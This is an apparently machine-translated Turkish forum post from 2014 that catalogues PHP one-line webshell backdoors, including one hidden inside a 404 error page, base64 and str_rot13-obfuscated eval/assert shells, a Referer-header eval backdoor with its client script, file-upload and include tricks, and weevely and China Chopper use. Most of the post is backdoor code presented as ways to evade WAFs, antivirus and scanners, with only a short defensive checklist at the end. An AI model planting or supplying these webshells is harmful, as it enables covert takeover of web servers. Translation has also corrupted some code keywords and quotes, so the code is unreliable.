Bu PHP arka kapı programlarına öğrenme zihniyetiyle yaklaşıyoruz ve birçok PHP arka kapı kodu, programcıların ne kadar iyi niyetli olduğunu görmemizi sağlıyor.
Güçlü PHP arka kapısı tek cümlede
Bu tür bir arka kapı, web sitelerine,Sunucu yöneticileri çok sorunludur ve çeşitli algılamalar yapmak için genellikle yöntemleri değiştirmek zorunda kalırlar; ayrıca birçok yeni yazma tekniği keşfedilip sıradan algılama yöntemleriyle ele alınamaz.
Bugün bazı ilginç PHP Trojan'larını sayacağız.
1. 404 sayfa kullanarak PHP ponilerini gizleyin:
[mw_shl_code=php,doğru] <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Bulunmadı</title>
</head><body>
<h1>Bulunmadı</h1>
<p>İstenen URL bu sunucuda bulunamadı.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Bulunmadı');
?>[/mw_shl_code]
404 sayfası web sitesinde sıkça kullanılan bir dosyadır ve genellikle önerildikten sonra çok az kişi kontrol edip değiştirir, bu yüzden arka kapıyı gizlemek için bunu kullanabiliriz.
2. Özelliksiz gizli PHP tek cümlede:
[mw_shl_code=php,doğru]<?php
session_start();
$_POST['code'] & $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.' v’.‘ a’.‘ l’.‘ (base64_decode($_SESSION[\'theCode\']))','a');
?>[/mw_shl_code]
$_SESSION['theCode']'a $_POST['code'] atayın ve ardından $_SESSION['theCode'] çalıştırın; en önemli nokta imza kodu olmamasıdır.
Kodu kontrol etmek için tarama aracı kullanırsanız, alarm vermez ve hedefe ulaşır.
3. Süper Gizli PHP Arka Kapısı:
[mw_shl_code=php,true]<?php $_GET[a]($_GET);?>
[/mw_shl_code]
Tek başına GET fonksiyonu bir Trojan'ı oluşturur;
Nasıl kullanılır:
[mw_shl_code=php,doğru]
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28P[/mw_shl_code]
Çalıştırmadan sonra, mevcut dizin A parametresi değerlendiğinde Trojan cümlesi c.php oluşturur; Troya oluşturma hatası başarısız olur ve assert edildiğinde de hata bildirir, ancak küçümsenmez bir Truva atı oluşturur.
Seviye isteği, PHP arka kapısını çalıştırmak için kod:
Bu yöntem iki dosya ile uygulanır: dosya 1
[mw_shl_code=php,doğru]<?php
//1.php
header('İçerik türü:metin/html; charset=utf-8′);
parse_str($_SERVER['HTTP_REFERER'], $a);
if(reset($a) == '10'&& count($a) == 9) {
eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
}
?>[/mw_shl_code]
Belge 2
[mw_shl_code=php,doğru]<?php
//2.php
header('İçerik türü:metin/html; charset=utf-8′);
//要执行的代码
$code= <<<KOD
phpinfo();
CODE;
//进行base64编码
$code= base64_encode($code);
//构造referer字符串
$referer= "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
//后门url
$url= 'http://localhost/test1/1.php';
$ch= curl_init();
$options= dizi(
CURLOPT_URL => $url,
CURLOPT_HEADER => YANLIŞ,
CURLOPT_RETURNTRANSFER => DOĞRU,
CURLOPT_REFERER => $referer
);
curl_setopt_array($ch, $options);
echocurl_exec($ch);
?>[/mw_shl_code]
HTTP isteğindeki HTTP_REFERER üzerinden base64 kodlu kodu çalıştırarak arka kapı etkisini elde edin.
Bu fikri WAF'ı atlamak için kullanmak iyidir.
4.PHP arka kapı jeneratör aracı weevely
weevely PHP'ye özgü birWebshell ücretsiz yazılımı, telnet'e benzer bir bağlantı kabuğunu simüle etmek için kullanılabilir, Weevely genellikle web programı istismarı, arka kapıları gizlemek veya web sayfası tabanlı yönetim yerine telnet benzeri yöntemler kullanmak için kullanılır, Weevely tarafından üretilen sunucu tarafı PHP kodu base64 kodludur, böylece ana akım antivirüs yazılımlarını ve IDS'yi kandırabilir. Sunucu tarafı kodu yükledikten sonra genellikle doğrudan Weevely üzerinden çalıştırabilirsiniz.
Arka kapıda kullanılan fonksiyonlar genellikle dizi işleme fonksiyonlarıdır ve denetim kuralları olarak kullanılan değerlendirme ve sistem gibi fonksiyonlar doğrudan kodda görünmez, böylece arka kapı dosyası arka kapı arama aracının kontrolünü atlayabilir. Karanlık grubun web arka kapı tespit aracıyla tarama, dosyanın tehdit altında olmadığını gösteriyor.
Yukarıdaki genel bir giriştir ve ilgili kullanım yöntemleri burada tanıtılmamıştır; bu basit bir bilim popülerleşmesidir.
4. Üç şekilsiz tek cümlelik PHP Trojanlı
İlki:
[mw_shl_code=php,true]<?php ($_=@$_GET[2]).@$_($_POST[1])?>
[/mw_shl_code]
İkinci
[mw_shl_code=php,doğru]<?php
$_=“”;
$_[+“”]=”;
$_=“$_”.“”;
$_=($_[+“”]|“ �”). ($_[+“”]|“”). ($_[+“”]^“�”);
?>
<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>[/mw_shl_code]
Mutfak bıçağına http://site/2.php?_=assert&__=eval($_POST['pass']) şifre yaz pass is pass.
Mutfak bıçağının ek verilerini kullanırsanız, daha gizlidir ya da başka enjeksiyon araçlarını da kullanabilirsiniz, çünkü sonradan gönderilir.
Üçüncü
[mw_shl_code=php,doğru] ($b 4dboy= $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').' ($b 4dboy)', 'ekleme'); [/mw_shl_code]
str_rot13 ('riny') kodlanmış değerlendirmedir; anahtar kelimelerden tamamen kaçınır ve etkisini kaybeder, insanları kan kustur!
5. Son olarak, birkaç gelişmiş PHP Trojan arka kapısını listeleyin:
1、
[mw_shl_code=php,true]$hh= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”;
$hh("/[discuz]/e",$_POST['h'],"Erişim"); [/mw_shl_code]
//菜刀一句话
2、
[mw_shl_code=php,true]$filename=$_GET['xbid'];
içeriyor($filename); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行
3、
[mw_shl_code=php,true]$reg="c"." o”.“ p”.“ y”;
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
[/mw_shl_code]
//重命名任何文件
4、
[mw_shl_code=php,doğru]$gzid= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”;
$gzid("/[discuz]/e",$_POST['h'],"Erişim"); [/mw_shl_code]
//菜刀一句话
5、
[mw_shl_code=php,true]include($uid); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行,POST
[mw_shl_code=php,doğru]www.xxx.com/index.php?uid=/home/www/bbs/image.gif [/mw_shl_code]
//gif插一句话
Özetle, bu PHP arka kapıları tam olarak tanımlanabilir, dikkatli olmazsanız kesinlikle kandırılırsınız ve bugün makalemizin en öncelikli aşaması nedir? Temel noktalar aşağıdaki özette yer almaktadır!
PHP tek cümlelik arka kapı ile nasıl başa çıkılır:
Birkaç önemli noktaya vurgu yapıyoruz ve bu makaleyi okuduysanız, sıradan biri olmadığınızı düşünüyorum, bu yüzden uzun uzun konuşmayacağım:
- PHP programları yazarken güvenliğin farkında olun
- Server log dosyaları sık okunmalı ve sık sık yedeklenmelidir
- Her site için sıkı izin ataması
- Dinamik dosya ve dizinlerin sık toplu güvenlik incelemeleri
- "Davranışsal Yargı Soruşturması ve Öldürme" adlı manuel antivirüs uygulamasını nasıl uygulayacağınızı öğrenin
- Takipte kalın veya aktif bir siber güvenlik kampına sızın
- Bir fonksiyon bile sunucu ortamının hiyerarşik işlemesi için kural olarak kullanılabilir
Daha fazla site ve büyük miktarda veri olduğunda, makul şekilde yardımcı araçlar uygulamamız gerektiğine inanıyoruz, ancak tamamen bu araçlara güvenmemeliyiz, teknoloji sürekli güncelleniyor ve gelişiyor, en önemlisi bu güçlü arka kapı insanları yazmanın düşüncesini öğrenmeniz ve anlamanız, rol transferi size daha büyük ilerleme getirebilir.
|
Yayınlandı 1.12.2014 21:41:13
